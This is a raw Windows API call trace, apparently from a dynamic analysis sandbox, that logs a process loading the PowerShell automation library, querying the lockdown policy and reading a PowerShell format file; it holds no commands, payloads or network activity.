	[0044.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.934] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6b160802, Data2=0x66fe, Data3=0x4d36, Data4=([0]=0x94, [1]=0x9c, [2]=0x7a, [3]=0x45, [4]=0xf, [5]=0xc1, [6]=0x91, [7]=0xa4))) returned 0x0
	[0044.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.936] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xed1ff2fe, Data2=0x136c, Data3=0x4352, Data4=([0]=0xb9, [1]=0x7e, [2]=0x5d, [3]=0x7a, [4]=0x44, [5]=0x45, [6]=0x50, [7]=0x79))) returned 0x0
	[0044.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.936] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x69fb6ccf, Data2=0x3904, Data3=0x4003, Data4=([0]=0x8c, [1]=0x64, [2]=0x50, [3]=0x9d, [4]=0xca, [5]=0xe6, [6]=0x9b, [7]=0x7f))) returned 0x0
	[0044.936] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x517db70d, Data2=0x2249, Data3=0x4b14, Data4=([0]=0xb6, [1]=0x3d, [2]=0x56, [3]=0x72, [4]=0xc5, [5]=0x89, [6]=0x6b, [7]=0x13))) returned 0x0
	[0044.937] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x3be76d83, Data2=0xef60, Data3=0x4092, Data4=([0]=0xab, [1]=0x77, [2]=0xd1, [3]=0xb2, [4]=0x56, [5]=0x39, [6]=0xd3, [7]=0x88))) returned 0x0
	[0044.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.938] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd8798a13, Data2=0x70e, Data3=0x4cd3, Data4=([0]=0x94, [1]=0x9f, [2]=0xe3, [3]=0x1b, [4]=0x69, [5]=0x86, [6]=0x1, [7]=0x96))) returned 0x0
	[0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.939] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x2c84f547, Data2=0xd1cf, Data3=0x4e35, Data4=([0]=0xa4, [1]=0xc7, [2]=0xb1, [3]=0xa9, [4]=0x8b, [5]=0x9a, [6]=0xc2, [7]=0x50))) returned 0x0
	[0044.939] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x7b8bdabe, Data2=0xeb10, Data3=0x42ac, Data4=([0]=0xa3, [1]=0xc6, [2]=0x42, [3]=0xf7, [4]=0xa4, [5]=0xce, [6]=0x7a, [7]=0x75))) returned 0x0
	[0044.939] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x56cbc283, Data2=0xf1ae, Data3=0x472a, Data4=([0]=0xb6, [1]=0xdd, [2]=0xfa, [3]=0x2, [4]=0x2e, [5]=0x7, [6]=0x9a, [7]=0x5))) returned 0x0
	[0044.940] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xac57ceda, Data2=0x7565, Data3=0x4082, Data4=([0]=0x9b, [1]=0x8a, [2]=0xf0, [3]=0x4b, [4]=0xf1, [5]=0xe3, [6]=0x65, [7]=0x69))) returned 0x0
	[0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.940] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8b90
	[0044.940] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8b90, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.940] CoTaskMemFree (pv=0x1505f3b8b90) 
	[0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0044.940] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0044.941] WldpGetLockdownPolicy () returned 0x0
	[0044.941] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.941] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0044.941] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0044.941] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0044.941] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.942] GetFileType (hFile=0x3d8) returned 0x1
	[0044.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.942] GetFileType (hFile=0x3d8) returned 0x1
	[0044.942] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0044.942] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.943] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
	[0044.943] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.943] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2000
	[0044.943] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.943] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3000
	[0044.944] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.944] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x4000
	[0044.944] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.944] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x5000
	[0044.944] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.951] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x6000
	[0044.951] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.951] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x7000
	[0044.951] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.952] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x8000
	[0044.952] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.952] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x9000
	[0044.952] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.952] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xa000
	[0044.952] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.953] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xb000
	[0044.953] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.953] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xc000
	[0044.953] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.953] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xd000
